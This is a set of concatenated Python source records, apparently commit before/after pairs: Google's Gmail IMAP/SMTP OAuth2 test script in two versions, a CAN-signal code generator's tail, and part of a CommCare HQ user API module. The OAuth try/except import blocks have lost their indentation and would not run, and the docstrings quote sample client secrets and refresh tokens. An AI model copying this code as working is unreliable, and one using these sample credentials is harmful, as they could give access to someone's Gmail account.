                                       signal['generic_name'],
                                       signal['bit_position'],
                                       signal['bit_size'],
                                       signal.get('factor', 1),
                                       signal.get('offset', 0),
                                       signal.get('value_handler', None),
                                       states))
def main():
    """Entry point: choose hex or JSON parser, parse, and emit C source."""
    options = parse_options()
    if options.hex_file:
        source_parser = HexParser(options.hex_file)
    else:
        source_parser = JsonParser(options.json_files)
    source_parser.parse()
    source_parser.print_source()


if __name__ == "__main__":
    sys.exit(main())
|
#!/usr/bin/env python
#
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Performs client tasks for testing IMAP OAuth2 authentication.
To use this script, you'll need to have registered with Google as an OAuth
application and obtained an OAuth client ID and client secret.
See https://developers.google.com/identity/protocols/OAuth2 for instructions on
registering and for documentation of the APIs invoked by this code.
This script has 3 modes of operation.
1. The first mode is used to generate and authorize an OAuth2 token, the
first step in logging in via OAuth2.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--generate_oauth2_token
The script will converse with Google and generate an oauth request
token, then present you with a URL you should visit in your browser to
authorize the token. Once you get the verification code from the Google
website, enter it into the script to get your OAuth access token. The output
from this command will contain the access token, a refresh token, and some
metadata about the tokens. The access token can be used until it expires, and
the refresh token lasts indefinitely, so you should record these values for
reuse.
2. The script will generate new access tokens using a refresh token.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--refresh_token=1/Yzm6MRy4q1xi7Dx2DuWXNgT6s37OrP_DW_IoyTum4YA
3. The script will generate an OAuth2 string that can be fed
directly to IMAP or SMTP. This is triggered with the --generate_oauth2_string
option.
oauth2 --generate_oauth2_string --user=xxx@gmail.com \
--access_token=ya29.AGy[...]ezLg
The output of this mode will be a base64-encoded string. To use it, connect to a
IMAPFE and pass it as the second argument to the AUTHENTICATE command.
a AUTHENTICATE XOAUTH2 a9sha9sfs[...]9dfja929dk==
"""
from __future__ import print_function
from future.utils import iteritems
from builtins import input
import base64
import imaplib
import json
from optparse import OptionParser
import smtplib
import sys
try:
# Python 2.X
from urllib import quote as urllib_quote
from urllib import unquote as urllib_unquote
from urllib import urlencode as urllib_urlencode
from urllib2 import urlopen as urllib_urlopen
except ImportError:
# Python 3+
from urllib.parse import quote as urllib_quote
from urllib.parse import unquote as urllib_unquote
from urllib.parse import urlencode as urllib_urlencode
from urllib.request import urlopen as urllib_urlopen
def SetupOptionParser():
    """Build the optparse parser; the module docstring is the usage text."""
    # Data-driven: (flags, kwargs) pairs added in display order.
    option_specs = [
        (('--generate_oauth2_token',),
         dict(action='store_true', dest='generate_oauth2_token',
              help='generates an OAuth2 token for testing')),
        (('--generate_oauth2_string',),
         dict(action='store_true', dest='generate_oauth2_string',
              help='generates an initial client response string for '
                   'OAuth2')),
        (('--client_id',),
         dict(default=None,
              help='Client ID of the application that is authenticating. '
                   'See OAuth2 documentation for details.')),
        (('--client_secret',),
         dict(default=None,
              help='Client secret of the application that is '
                   'authenticating. See OAuth2 documentation for '
                   'details.')),
        (('--access_token',), dict(default=None, help='OAuth2 access token')),
        (('--refresh_token',), dict(default=None, help='OAuth2 refresh token')),
        (('--scope',),
         dict(default='https://mail.google.com/',
              help='scope for the access token. Multiple scopes can be '
                   'listed separated by spaces with the whole argument '
                   'quoted.')),
        (('--test_imap_authentication',),
         dict(action='store_true', dest='test_imap_authentication',
              help='attempts to authenticate to IMAP')),
        (('--test_smtp_authentication',),
         dict(action='store_true', dest='test_smtp_authentication',
              help='attempts to authenticate to SMTP')),
        (('--user',),
         dict(default=None,
              help='email address of user whose account is being '
                   'accessed')),
    ]
    parser = OptionParser(usage=__doc__)
    for flags, kwargs in option_specs:
        parser.add_option(*flags, **kwargs)
    return parser
# The URL root for accessing Google Accounts.
GOOGLE_ACCOUNTS_BASE_URL = 'https://accounts.google.com'

# Hardcoded dummy redirect URI for non-web apps.
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'


def AccountsUrl(command):
    """Build the full Google Accounts URL for *command*.

    Args:
      command: The command to execute.

    Returns:
      A URL for the given command.
    """
    return '/'.join((GOOGLE_ACCOUNTS_BASE_URL, command))
def UrlEscape(text):
    """Percent-encode *text* per OAuth 5.1 (keeps '~', '-', '.', '_')."""
    return urllib_quote(text, safe='~-._')


def UrlUnescape(text):
    """Reverse of UrlEscape(): decode percent-escapes in *text*."""
    return urllib_unquote(text)


def FormatUrlParams(params):
    """Format *params* (a key-value map) as a key-sorted URL query string."""
    pairs = sorted(params.items())
    return '&'.join('%s=%s' % (key, UrlEscape(value)) for key, value in pairs)
def GeneratePermissionUrl(client_id, scope='https://mail.google.com/'):
    """Generate the URL the user must visit to authorize access.

    Implements the user-facing half of the "OAuth2 for Installed
    Applications" flow described at
    https://developers.google.com/accounts/docs/OAuth2InstalledApp

    Args:
      client_id: Client ID obtained by registering your app.
      scope: scope for access token, e.g. 'https://mail.google.com'

    Returns:
      A URL that the user should visit in their browser.
    """
    params = {
        'client_id': client_id,
        'redirect_uri': REDIRECT_URI,
        'scope': scope,
        'response_type': 'code',
    }
    return '%s?%s' % (AccountsUrl('o/oauth2/auth'), FormatUrlParams(params))
def AuthorizeTokens(client_id, client_secret, authorization_code):
    """Obtains OAuth access token and refresh token.

    This uses the application portion of the "OAuth2 for Installed Applications"
    flow at https://developers.google.com/accounts/docs/OAuth2InstalledApp#handlingtheresponse

    Args:
      client_id: Client ID obtained by registering your app.
      client_secret: Client secret obtained by registering your app.
      authorization_code: code generated by Google Accounts after user grants
          permission.

    Returns:
      The decoded response from the Google Accounts server, as a dict. Expected
      fields include 'access_token', 'expires_in', and 'refresh_token'.
    """
    params = {}
    params['client_id'] = client_id
    params['client_secret'] = client_secret
    params['code'] = authorization_code
    params['redirect_uri'] = REDIRECT_URI
    params['grant_type'] = 'authorization_code'
    request_url = AccountsUrl('o/oauth2/token')
    # Bug fix for Python 3: urlopen() POST data must be bytes and read()
    # returns bytes, so encode the form body and decode the response.
    body = urllib_urlencode(params).encode('utf-8')
    response = urllib_urlopen(request_url, body).read()
    return json.loads(response.decode('utf-8'))
def RefreshToken(client_id, client_secret, refresh_token):
    """Obtains a new token given a refresh token.

    See https://developers.google.com/accounts/docs/OAuth2InstalledApp#refresh

    Args:
      client_id: Client ID obtained by registering your app.
      client_secret: Client secret obtained by registering your app.
      refresh_token: A previously-obtained refresh token.

    Returns:
      The decoded response from the Google Accounts server, as a dict. Expected
      fields include 'access_token', 'expires_in', and 'refresh_token'.
    """
    params = {}
    params['client_id'] = client_id
    params['client_secret'] = client_secret
    params['refresh_token'] = refresh_token
    params['grant_type'] = 'refresh_token'
    request_url = AccountsUrl('o/oauth2/token')
    # Bug fix for Python 3: urlopen() POST data must be bytes and read()
    # returns bytes, so encode the form body and decode the response.
    body = urllib_urlencode(params).encode('utf-8')
    response = urllib_urlopen(request_url, body).read()
    return json.loads(response.decode('utf-8'))
def GenerateOAuth2String(username, access_token, base64_encode=True):
    """Generates an IMAP OAuth2 authentication string.

    See https://developers.google.com/google-apps/gmail/oauth2_overview

    Args:
      username: the username (email address) of the account to authenticate
      access_token: An OAuth2 access token.
      base64_encode: Whether to base64-encode the output.

    Returns:
      The SASL argument for the OAuth2 mechanism, as a text string.
    """
    auth_string = 'user=%s\1auth=Bearer %s\1\1' % (username, access_token)
    if base64_encode:
        # Bug fix for Python 3: base64 operates on bytes. Encode first, then
        # decode back to str so callers can print/concatenate it as before.
        auth_string = base64.b64encode(
                auth_string.encode('ascii')).decode('ascii')
    return auth_string
def TestImapAuthentication(user, auth_string):
    """Authenticates to IMAP with the given auth_string.

    Prints a debug trace of the attempted IMAP connection.

    Args:
      user: The Gmail username (full email address)
      auth_string: A valid OAuth2 string, as returned by GenerateOAuth2String.
          Must not be base64-encoded, since imaplib does its own base64-encoding.
    """
    # Bug fix: with print_function imported, a bare ``print`` is a no-op
    # expression -- call it to emit the intended blank line.
    print()
    imap_conn = imaplib.IMAP4_SSL('imap.gmail.com')
    imap_conn.debug = 4
    imap_conn.authenticate('XOAUTH2', lambda x: auth_string)
    imap_conn.select('INBOX')
def TestSmtpAuthentication(user, auth_string):
    """Authenticates to SMTP with the given auth_string.

    Args:
      user: The Gmail username (full email address)
      auth_string: A valid OAuth2 string, not base64-encoded, as returned by
          GenerateOAuth2String.
    """
    # Bug fix: with print_function imported, a bare ``print`` is a no-op
    # expression -- call it to emit the intended blank line.
    print()
    smtp_conn = smtplib.SMTP('smtp.gmail.com', 587)
    smtp_conn.set_debuglevel(True)
    smtp_conn.ehlo('test')
    smtp_conn.starttls()
    # Bug fix for Python 3: b64encode needs bytes; decode back to str so the
    # concatenation with 'XOAUTH2 ' works on both Python 2 and 3.
    smtp_conn.docmd('AUTH', 'XOAUTH2 ' + base64.b64encode(
            auth_string.encode('ascii')).decode('ascii'))
def RequireOptions(options, *args):
    """Abort (exit code -1) unless every named option has a value.

    Args:
      options: parsed optparse values object.
      *args: option attribute names that must not be None.
    """
    missing = [arg for arg in args if getattr(options, arg) is None]
    if not missing:
        return
    print('Missing options: %s' % ' '.join(missing))
    sys.exit(-1)
def main(argv):
    """Dispatch on the parsed options: refresh a token, generate an OAuth2
    string or token, or run an IMAP/SMTP authentication test.

    Args:
      argv: unused; optparse reads sys.argv itself.
    """
    parser = SetupOptionParser()
    (options, remaining) = parser.parse_args()
    if options.refresh_token:
        RequireOptions(options, 'client_id', 'client_secret')
        response = RefreshToken(options.client_id, options.client_secret,
                                options.refresh_token)
        print('Access Token: %s' % response['access_token'])
        print('Access Token Expiration Seconds: %s' % response['expires_in'])
    elif options.generate_oauth2_string:
        RequireOptions(options, 'user', 'access_token')
        oauth2_string = GenerateOAuth2String(options.user, options.access_token)
        print('OAuth2 argument:\n' + oauth2_string)
    elif options.generate_oauth2_token:
        RequireOptions(options, 'client_id', 'client_secret')
        print('To authorize token, visit this url and follow the directions:')
        print('  %s' % GeneratePermissionUrl(options.client_id, options.scope))
        authorization_code = input('Enter verification code: ')
        response = AuthorizeTokens(options.client_id, options.client_secret,
                                   authorization_code)
        print('Refresh Token: %s' % response['refresh_token'])
        print('Access Token: %s' % response['access_token'])
        print('Access Token Expiration Seconds: %s' % response['expires_in'])
    elif options.test_imap_authentication:
        RequireOptions(options, 'user', 'access_token')
        TestImapAuthentication(options.user,
            GenerateOAuth2String(options.user, options.access_token,
                                 base64_encode=False))
    elif options.test_smtp_authentication:
        RequireOptions(options, 'user', 'access_token')
        TestSmtpAuthentication(options.user,
            GenerateOAuth2String(options.user, options.access_token,
                                 base64_encode=False))
    else:
        parser.print_help()
        print('Nothing to do, exiting.')
        return
Python 2/3 compatibility: strings and bytes
#!/usr/bin/env python
#
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Performs client tasks for testing IMAP OAuth2 authentication.
To use this script, you'll need to have registered with Google as an OAuth
application and obtained an OAuth client ID and client secret.
See https://developers.google.com/identity/protocols/OAuth2 for instructions on
registering and for documentation of the APIs invoked by this code.
This script has 3 modes of operation.
1. The first mode is used to generate and authorize an OAuth2 token, the
first step in logging in via OAuth2.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--generate_oauth2_token
The script will converse with Google and generate an oauth request
token, then present you with a URL you should visit in your browser to
authorize the token. Once you get the verification code from the Google
website, enter it into the script to get your OAuth access token. The output
from this command will contain the access token, a refresh token, and some
metadata about the tokens. The access token can be used until it expires, and
the refresh token lasts indefinitely, so you should record these values for
reuse.
2. The script will generate new access tokens using a refresh token.
oauth2 --user=xxx@gmail.com \
--client_id=1038[...].apps.googleusercontent.com \
--client_secret=VWFn8LIKAMC-MsjBMhJeOplZ \
--refresh_token=1/Yzm6MRy4q1xi7Dx2DuWXNgT6s37OrP_DW_IoyTum4YA
3. The script will generate an OAuth2 string that can be fed
directly to IMAP or SMTP. This is triggered with the --generate_oauth2_string
option.
oauth2 --generate_oauth2_string --user=xxx@gmail.com \
--access_token=ya29.AGy[...]ezLg
The output of this mode will be a base64-encoded string. To use it, connect to a
IMAPFE and pass it as the second argument to the AUTHENTICATE command.
a AUTHENTICATE XOAUTH2 a9sha9sfs[...]9dfja929dk==
"""
from __future__ import print_function
from future.utils import iteritems
from builtins import input
import base64
import imaplib
import json
from optparse import OptionParser
import smtplib
import sys
# urllib Python 2/3 compatible code.
# urllib2 provides some extra functionality, namely the urlopen() function
# can allow you to specify headers.
# See: https://stackoverflow.com/a/2018074
try:
# Python 2.X
from urllib import quote as urllib_quote
from urllib import unquote as urllib_unquote
from urllib import urlencode as urllib_urlencode
from urllib2 import urlopen as urllib_urlopen
except ImportError:
# Python 3+
from urllib.parse import quote as urllib_quote
from urllib.parse import unquote as urllib_unquote
from urllib.parse import urlencode as urllib_urlencode
from urllib.request import urlopen as urllib_urlopen
def SetupOptionParser():
    """Create the option parser for this tool (usage = module docstring)."""
    opt_parser = OptionParser(usage=__doc__)
    opt_parser.add_option('--generate_oauth2_token',
                          dest='generate_oauth2_token',
                          action='store_true',
                          help='generates an OAuth2 token for testing')
    opt_parser.add_option('--generate_oauth2_string',
                          dest='generate_oauth2_string',
                          action='store_true',
                          help='generates an initial client response string for '
                               'OAuth2')
    opt_parser.add_option('--client_id',
                          default=None,
                          help='Client ID of the application that is authenticating. '
                               'See OAuth2 documentation for details.')
    opt_parser.add_option('--client_secret',
                          default=None,
                          help='Client secret of the application that is '
                               'authenticating. See OAuth2 documentation for '
                               'details.')
    opt_parser.add_option('--access_token',
                          default=None,
                          help='OAuth2 access token')
    opt_parser.add_option('--refresh_token',
                          default=None,
                          help='OAuth2 refresh token')
    opt_parser.add_option('--scope',
                          default='https://mail.google.com/',
                          help='scope for the access token. Multiple scopes can be '
                               'listed separated by spaces with the whole argument '
                               'quoted.')
    opt_parser.add_option('--test_imap_authentication',
                          dest='test_imap_authentication',
                          action='store_true',
                          help='attempts to authenticate to IMAP')
    opt_parser.add_option('--test_smtp_authentication',
                          dest='test_smtp_authentication',
                          action='store_true',
                          help='attempts to authenticate to SMTP')
    opt_parser.add_option('--user',
                          default=None,
                          help='email address of user whose account is being '
                               'accessed')
    return opt_parser
# The URL root for accessing Google Accounts.
GOOGLE_ACCOUNTS_BASE_URL = 'https://accounts.google.com'

# Hardcoded dummy redirect URI for non-web apps.
REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'


def AccountsUrl(command):
    """Return the absolute Google Accounts URL for *command*.

    Args:
      command: The command to execute.

    Returns:
      A URL for the given command.
    """
    return '{0}/{1}'.format(GOOGLE_ACCOUNTS_BASE_URL, command)
def UrlEscape(text):
    """Escape *text* per OAuth 5.1; '~', '-', '.' and '_' stay literal."""
    return urllib_quote(text, safe='~-._')


def UrlUnescape(text):
    """Undo UrlEscape() by decoding percent-escapes in *text*."""
    return urllib_unquote(text)


def FormatUrlParams(params):
    """Turn *params* (a key-value map) into a key-sorted query string."""
    fragments = ['%s=%s' % (name, UrlEscape(value))
                 for name, value in sorted(params.items())]
    return '&'.join(fragments)
def GeneratePermissionUrl(client_id, scope='https://mail.google.com/'):
    """Generates the URL for authorizing access.

    This uses the "OAuth2 for Installed Applications" flow described at
    https://developers.google.com/accounts/docs/OAuth2InstalledApp

    Args:
        client_id: Client ID obtained by registering your app.
        scope: scope for access token, e.g. 'https://mail.google.com'

    Returns:
        A URL that the user should visit in their browser.
    """
    query = FormatUrlParams({
        'client_id': client_id,
        'redirect_uri': REDIRECT_URI,
        'scope': scope,
        'response_type': 'code',
    })
    return '%s?%s' % (AccountsUrl('o/oauth2/auth'), query)
def AuthorizeTokens(client_id, client_secret, authorization_code):
    """Obtains OAuth access token and refresh token.

    This uses the application portion of the "OAuth2 for Installed
    Applications" flow at
    https://developers.google.com/accounts/docs/OAuth2InstalledApp#handlingtheresponse

    Args:
        client_id: Client ID obtained by registering your app.
        client_secret: Client secret obtained by registering your app.
        authorization_code: code generated by Google Accounts after user grants
            permission.

    Returns:
        The decoded response from the Google Accounts server, as a dict. Expected
        fields include 'access_token', 'expires_in', and 'refresh_token'.
    """
    request_body = urllib_urlencode({
        'client_id': client_id,
        'client_secret': client_secret,
        'code': authorization_code,
        'redirect_uri': REDIRECT_URI,
        'grant_type': 'authorization_code',
    }).encode("utf-8")
    raw_response = urllib_urlopen(AccountsUrl('o/oauth2/token'), request_body).read()
    return json.loads(raw_response.decode('utf-8'))
def RefreshToken(client_id, client_secret, refresh_token):
    """Obtains a new token given a refresh token.

    See https://developers.google.com/accounts/docs/OAuth2InstalledApp#refresh

    Args:
        client_id: Client ID obtained by registering your app.
        client_secret: Client secret obtained by registering your app.
        refresh_token: A previously-obtained refresh token.

    Returns:
        The decoded response from the Google Accounts server, as a dict. Expected
        fields include 'access_token', 'expires_in', and 'refresh_token'.
    """
    request_body = urllib_urlencode({
        'client_id': client_id,
        'client_secret': client_secret,
        'refresh_token': refresh_token,
        'grant_type': 'refresh_token',
    }).encode("utf-8")
    raw_response = urllib_urlopen(AccountsUrl('o/oauth2/token'), request_body).read()
    return json.loads(raw_response.decode('utf-8'))
def GenerateOAuth2String(username, access_token, base64_encode=True):
    """Generates an IMAP OAuth2 authentication string.

    See https://developers.google.com/google-apps/gmail/oauth2_overview

    Args:
        username: the username (email address) of the account to authenticate
        access_token: An OAuth2 access token.
        base64_encode: Whether to base64-encode the output.

    Returns:
        The SASL argument for the OAuth2 mechanism.
    """
    sasl_arg = 'user=%s\1auth=Bearer %s\1\1' % (username, access_token)
    if not base64_encode:
        return sasl_arg
    # b64encode operates on bytes, so round-trip through encode()/decode()
    # to return a str.
    return base64.b64encode(sasl_arg.encode()).decode()
def TestImapAuthentication(user, auth_string):
    """Authenticates to IMAP with the given auth_string.

    Prints a debug trace of the attempted IMAP connection.

    Args:
        user: The Gmail username (full email address)
        auth_string: A valid OAuth2 string, as returned by GenerateOAuth2String.
            Must not be base64-encoded, since imaplib does its own base64-encoding.
    """
    # Bug fix: a bare `print` is a Python 2 statement; in Python 3 it merely
    # evaluates the builtin and prints nothing. Call it to emit a blank line.
    print()
    imap_conn = imaplib.IMAP4_SSL('imap.gmail.com')
    imap_conn.debug = 4  # maximum imaplib debug verbosity
    imap_conn.authenticate('XOAUTH2', lambda x: auth_string)
    imap_conn.select('INBOX')
def TestSmtpAuthentication(user, auth_string):
    """Authenticates to SMTP with the given auth_string.

    Args:
        user: The Gmail username (full email address)
        auth_string: A valid OAuth2 string, not base64-encoded, as returned by
            GenerateOAuth2String.
    """
    # Bug fix: bare `print` was a Python 2 statement and is a no-op in Python 3.
    print()
    smtp_conn = smtplib.SMTP('smtp.gmail.com', 587)
    smtp_conn.set_debuglevel(True)
    smtp_conn.ehlo('test')
    smtp_conn.starttls()
    # Bug fix: base64.b64encode() requires bytes in Python 3; passing the str
    # auth_string raised TypeError. Encode first, then decode the result so
    # the AUTH command is still assembled from str.
    smtp_conn.docmd('AUTH', 'XOAUTH2 ' + base64.b64encode(auth_string.encode()).decode())
def RequireOptions(options, *args):
    """Exit the program unless every option named in `args` was supplied."""
    missing = [name for name in args if getattr(options, name) is None]
    if not missing:
        return
    print('Missing options: %s' % ' '.join(missing))
    sys.exit(-1)
def main(argv):
    """Parse command-line flags and dispatch to exactly one OAuth2 action."""
    options_parser = SetupOptionParser()
    (options, args) = options_parser.parse_args()
    if options.refresh_token:
        # Exchange a refresh token for a fresh access token.
        RequireOptions(options, 'client_id', 'client_secret')
        response = RefreshToken(options.client_id, options.client_secret,
                                options.refresh_token)
        print('Access Token: %s' % response['access_token'])
        print('Access Token Expiration Seconds: %s' % response['expires_in'])
    elif options.generate_oauth2_string:
        # Emit the base64-encoded SASL XOAUTH2 argument for an access token.
        RequireOptions(options, 'user', 'access_token')
        print('OAuth2 argument:\n' +
              GenerateOAuth2String(options.user, options.access_token))
    elif options.generate_oauth2_token:
        # Interactive first-time authorization: show the consent URL, then
        # trade the pasted verification code for refresh/access tokens.
        RequireOptions(options, 'client_id', 'client_secret')
        print('To authorize token, visit this url and follow the directions:')
        print(' %s' % GeneratePermissionUrl(options.client_id, options.scope))
        authorization_code = input('Enter verification code: ')
        response = AuthorizeTokens(options.client_id, options.client_secret,
                                   authorization_code)
        print('Refresh Token: %s' % response['refresh_token'])
        print('Access Token: %s' % response['access_token'])
        print('Access Token Expiration Seconds: %s' % response['expires_in'])
    elif options.test_imap_authentication:
        # Raw (non-base64) string: imaplib base64-encodes it itself.
        RequireOptions(options, 'user', 'access_token')
        TestImapAuthentication(options.user,
                               GenerateOAuth2String(options.user, options.access_token,
                                                    base64_encode=False))
    elif options.test_smtp_authentication:
        RequireOptions(options, 'user', 'access_token')
        TestSmtpAuthentication(options.user,
                               GenerateOAuth2String(options.user, options.access_token,
                                                    base64_encode=False))
    else:
        options_parser.print_help()
        print('Nothing to do, exiting.')
        return
# Standard script entry point.
if __name__ == '__main__':
    main(sys.argv)
|
Add test case
|
import json
from collections import namedtuple
from django.conf.urls import re_path as url
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import gettext as _
from django.utils.translation import gettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from phonelog.models import DeviceReportEntry
from corehq import privileges, toggles
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.cors import add_cors_headers_to_response
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
raise_odata_permissions_issues,
)
from corehq.apps.api.resources.auth import (
AdminAuthentication,
LoginAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.groups.models import Group
from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.dbaccessors import get_datasources_for_domain
from corehq.apps.userreports.exceptions import BadSpecError
from corehq.apps.userreports.models import (
DataSourceConfiguration,
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.userreports.util import (
get_configurable_and_static_reports,
get_report_config_or_not_found,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
UserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound
from corehq.util.timer import TimingContext
from . import (
CorsResourceMixin,
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
)
from .pagination import DoesNothingPaginator, NoCountingPaginator
from ..exceptions import InvalidFormatException, InvalidFieldException, UpdateConflictException
from ..user_updates import update
# Test hook: when set, BulkUserResource queries this callable instead of
# user_es_call.
MOCK_BULK_USER_ES = None


def user_es_call(domain, q, fields, size, start_at):
    """Run a UserES query for `domain` and return the raw hits.

    `q`, when given, is applied as an Elasticsearch query_string query.
    """
    query = UserES().domain(domain).fields(fields).size(size).start(start_at)
    if q is not None:
        query.set_query({"query_string": {"query": q}})
    return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
    """Assign the role named in bundle.data['role'] to bundle.obj.

    Raises BadRequest when no role with that name exists in the domain.
    """
    role_name = bundle.data.get('role')
    # Check for roles associated with the domain; role names may not be
    # unique, so the first match's qualified id is used.
    domain_roles = UserRole.objects.by_domain_and_name(kwargs['domain'], role_name)
    if not domain_roles:
        raise BadRequest(f"Invalid User Role '{role_name}'")
    bundle.obj.set_role(kwargs['domain'], domain_roles[0].get_qualified_id())
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A read-only user data resource based on elasticsearch.
    Supported Params: limit offset q fields
    """
    type = "bulk-user"
    # Declarative tastypie fields; `self.fields` also serves as the whitelist
    # of names callers may request via the `fields` GET parameter.
    id = fields.CharField(attribute='id', readonly=True, unique=True)
    email = fields.CharField(attribute='email')
    username = fields.CharField(attribute='username', unique=True)
    first_name = fields.CharField(attribute='first_name', null=True)
    last_name = fields.CharField(attribute='last_name', null=True)
    phone_numbers = fields.ListField(attribute='phone_numbers', null=True)

    @staticmethod
    def to_obj(user):
        '''
        Takes a flat dict and returns an object
        '''
        # ES documents carry `_id`; expose it as `id` on the resulting object.
        if '_id' in user:
            user['id'] = user.pop('_id')
        return namedtuple('user', list(user))(**user)

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        object_class = object
        resource_name = 'bulk-user'

    def dehydrate(self, bundle):
        # Restrict the serialized payload to the explicitly requested fields;
        # with no `fields` param the bundle is returned untouched.
        fields = bundle.request.GET.getlist('fields')
        data = {}
        if not fields:
            return bundle
        for field in fields:
            data[field] = bundle.data[field]
        bundle.data = data
        return bundle

    def obj_get_list(self, bundle, **kwargs):
        # Reject requests for fields outside the declared field list.
        request_fields = bundle.request.GET.getlist('fields')
        for field in request_fields:
            if field not in self.fields:
                raise BadRequest('{0} is not a valid field'.format(field))
        params = bundle.request.GET
        param = lambda p: params.get(p, None)
        # Query ES for `_id` instead of `id`; to_obj maps it back.
        fields = list(self.fields)
        fields.remove('id')
        fields.append('_id')
        # MOCK_BULK_USER_ES lets tests stub out the ES call.
        fn = MOCK_BULK_USER_ES or user_es_call
        users = fn(
            domain=kwargs['domain'],
            q=param('q'),
            fields=fields,
            size=param('limit'),
            start_at=param('offset'),
        )
        return list(map(self.to_obj, users))

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'pk': get_obj(bundle_or_obj).id
        }
class CommCareUserResource(v0_1.CommCareUserResource):
    """v0.5 CommCare (mobile) user resource adding create/update/delete."""

    class Meta(v0_1.CommCareUserResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # On create, respond with just the new user's id instead of the
        # fully dehydrated bundle.
        if not isinstance(data, dict) and request.method == 'POST':
            data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        # Accepts None, a Bundle, or a bare CommCareUser object.
        if bundle_or_obj is None:
            return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=obj.domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))

    def obj_create(self, bundle, **kwargs):
        try:
            bundle.obj = CommCareUser.create(
                domain=kwargs['domain'],
                username=bundle.data['username'].lower(),
                password=bundle.data['password'],
                created_by=bundle.request.couch_user,
                created_via=USER_CHANGE_VIA_API,
                email=bundle.data.get('email', '').lower(),
            )
            # password was just set
            bundle.data.pop('password', None)
            # do not call update with username key
            bundle.data.pop('username', None)
            self._update(bundle)
            bundle.obj.save()
        except Exception:
            # Roll back the partially-created account: retire the couch user
            # and delete its backing django user if that got created.
            if bundle.obj._id:
                bundle.obj.retire(bundle.request.domain, deleted_by=bundle.request.couch_user,
                                  deleted_via=USER_CHANGE_VIA_API)
            try:
                django_user = bundle.obj.get_django_user()
            except User.DoesNotExist:
                pass
            else:
                django_user.delete()
            raise
        return bundle

    def obj_update(self, bundle, **kwargs):
        bundle.obj = CommCareUser.get(kwargs['pk'])
        assert bundle.obj.domain == kwargs['domain']
        user_change_logger = self._get_user_change_logger(bundle)
        # Apply all submitted fields, collecting errors rather than failing
        # on the first one.
        errors = self._update(bundle, user_change_logger)
        if errors:
            formatted_errors = ', '.join(errors)
            raise BadRequest(_('The request resulted in the following errors: {}').format(formatted_errors))
        # Re-check the domain was not changed by the update before saving.
